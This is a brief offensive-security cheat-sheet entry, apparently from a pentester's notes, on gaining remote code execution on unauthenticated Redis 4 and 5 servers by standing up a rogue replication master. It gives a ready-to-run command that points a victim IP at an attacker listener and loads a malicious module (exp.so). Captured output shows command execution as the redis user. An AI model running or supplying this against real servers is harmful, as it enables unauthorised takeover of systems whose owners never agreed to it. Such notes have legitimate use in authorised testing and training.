Redis 4 and 5 Unauthenticated RCE

rce, foothold

Overview #

You can deploy a rougue redis server and make use of its replication capabilities to execute arbritrary commands inside the server.

::NOTE::

Looks like this is for linux only

Steps #

# 10.10.70.254 - victim ip
# 10.11.40.33 - attacker ip
python3 redis-master.py -r 10.10.70.254 -p 6379 -L 10.11.40.33 -P 8888 -f RedisModulesSDK/exp.so -c "id"
...truncated...


# Clients
connected_clients:1
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0

uid=112(redis) gid=123(redis) groups=123(redis)

Notes #

References #